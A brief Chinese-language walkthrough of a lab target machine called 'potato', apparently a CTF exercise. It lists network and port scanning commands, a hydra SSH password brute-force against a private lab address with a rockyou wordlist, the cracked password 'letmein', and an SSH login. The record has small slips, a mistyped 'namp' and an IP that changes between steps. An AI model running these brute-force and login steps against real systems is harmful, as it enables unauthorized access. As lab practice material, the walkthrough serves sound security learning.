使用命令扫描靶机ip
arp-scan -l
尝试访问一下ip
发现一个大土豆没什么用
尝试扫描一下子域名
没有发现什么有用的信息
尝试扫描端口
namp -A 192.168.19.137 -p-
尝试访问一下端口,发现都访问不进去
查看源代码发现了网页的标题 potato,就想着爆破一下密码
hydra -l potato -P '/home/kali/桌面/rockyou-part1(1-25000).txt' ssh://192.168.19.137 -s 7120
爆破结果是密码为"letmein"
ssh potato@192.168.16.137 -p 7120
尝试登录一下ssh
